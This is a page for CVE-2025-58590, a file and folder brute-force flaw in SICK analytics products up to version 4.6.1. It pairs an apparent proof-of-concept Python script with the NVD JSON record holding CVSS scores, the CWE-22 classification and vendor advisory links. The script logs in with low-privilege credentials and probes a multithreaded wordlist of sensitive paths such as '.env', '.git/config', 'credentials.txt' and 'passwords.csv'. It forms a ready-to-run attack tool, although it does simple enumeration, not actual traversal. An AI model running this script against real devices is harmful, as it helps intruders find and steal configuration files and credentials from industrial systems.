CVE-2025-58590

# CVE-2025-58590 - SICK Product Directory Enumeration PoC # Description: Brute force folders and files to steal sensitive information # Requirements: requests, low-privilege authentication credentials import requests import sys from concurrent.futures import ThreadPoolExecutor TARGET_URL = "https://target-sick-device.example.com" USERNAME = "low_priv_user" PASSWORD = "password123" WORDLIST = [ "admin", "config", "backup", "logs", "data", ".env", "config.php", "settings.xml", "users.db", "secret", "private", "internal", "api", "docs", "system", "debug", "test", "upload", "downloads", ".git/config", ".svn/entries", "web.config", "database.yml", "credentials.txt", "passwords.csv" ] def check_path(session, base_url, path): """Check if a path exists on the target server""" url = f"{base_url}/{path}" try: response = session.get(url, timeout=5, verify=False) if response.status_code == 200: content_length = len(response.content) print(f"[+] FOUND: {url} (Status: {response.status_code}, Size: {content_length})") return (path, response.status_code, content_length) elif response.status_code == 403: print(f"[!] FORBIDDEN (exists): {url}") return (path, response.status_code, 0) except requests.exceptions.RequestException: pass return None def main(): session = requests.Session() # Authenticate with low-privilege credentials login_url = f"{TARGET_URL}/api/login" auth_data = {"username": USERNAME, "password": PASSWORD} try: session.post(login_url, json=auth_data, timeout=10) print(f"[*] Authenticated to {TARGET_URL}") except Exception as e: print(f"[-] Authentication failed: {e}") sys.exit(1) print(f"[*] Starting directory enumeration on {TARGET_URL}") found_resources = [] with ThreadPoolExecutor(max_workers=10) as executor: futures = [ executor.submit(check_path, session, TARGET_URL, path) for path in WORDLIST ] for future in futures: result = future.result() if result: found_resources.append(result) print(f"\n[*] Enumeration complete. Found {len(found_resources)} accessible resources.") for resource in found_resources: print(f" -> {resource[0]}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-58590", "sourceIdentifier": "[email protected]", "published": "2025-10-06T07:15:35.873", "lastModified": "2026-01-27T19:44:57.473", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "It's possible to brute force folders and files, what can be used by an attacker to steal sensitve information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.6.1", "matchCriteriaId": "DC690872-9AF3-4159-8AFA-DD78816446A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.6.1", "matchCriteriaId": "40EE515D-E8FD-490E-B0FF-9AABEC8488DA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.6.1", "matchCriteriaId": "A831A6C9-62EB-4E92-A300-1C37FA04E6C0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.6.1", "matchCriteriaId": "6BE16CA1-C2F5-44D5-974D-F98AD173DC61"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}